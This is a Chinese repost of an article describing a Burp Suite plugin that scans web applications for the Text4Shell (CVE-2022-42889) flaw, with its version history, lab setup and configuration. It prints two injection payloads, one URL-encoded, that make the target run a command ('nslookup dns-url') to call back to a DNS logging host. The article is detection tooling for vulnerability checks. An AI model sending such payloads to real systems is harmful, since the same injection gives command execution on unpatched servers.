项目地址:https://github.com/A0WaQ4/BurpText4ShellScan
简介使用java编写的Text4shell burp被动扫描插件
java maven项目,可以使用mvn package进行编译
更新
1.0 - 首次上传,对所有经过burp的包进行被动扫描,扫描对象包括了json、xml、fileupload
1.1 - 修复了body为空时导致的检测错误,修复了对URL参数不检测的错误
1.2 - 修复了body仅有json与xml时出现的参数构造错误,修复了dns二次检测时未获取key导致的错误
1.3 - 添加了主动扫描功能
1.4 - 添加了header黑名单功能,可以在resources/config.yml中修改
payload
- "%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup+dns-url%27%29%7D"
- "${scriptjava.lang.Runtime.getRuntime().exec('nslookup dns-url')}"
可以在resources/config.yml修改
使用
1. 搭建环境
使用github中的https://github.com/karthikuj/cve-2022-42889-text4shell-docker搭建环境
2.插件
代理访问http://yourip:80/text4shell/attack?search=aaa,开始扫描
在logger中可看见插件发送的包
仅对是否可以dnslog进行扫描,若dnslog接受到请求,则爆出漏洞
3. 配置
在resources/config.yml中的dnsLogModule修改dnslog配置,使用时可以修改为自搭建的DnsLog服务器
免责声明
该工具仅用于安全自查检测,由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
-
服务器
+关注
关注
12文章
9151浏览量
85407 -
JAVA
+关注
关注
19文章
2967浏览量
104743 -
GitHub
+关注
关注
3文章
471浏览量
16436
原文标题:Text4Shell的burp被动扫描插件
文章出处:【微信号:菜鸟学信安,微信公众号:菜鸟学信安】欢迎添加关注!文章转载请注明出处。
发布评论请先 登录
相关推荐
评论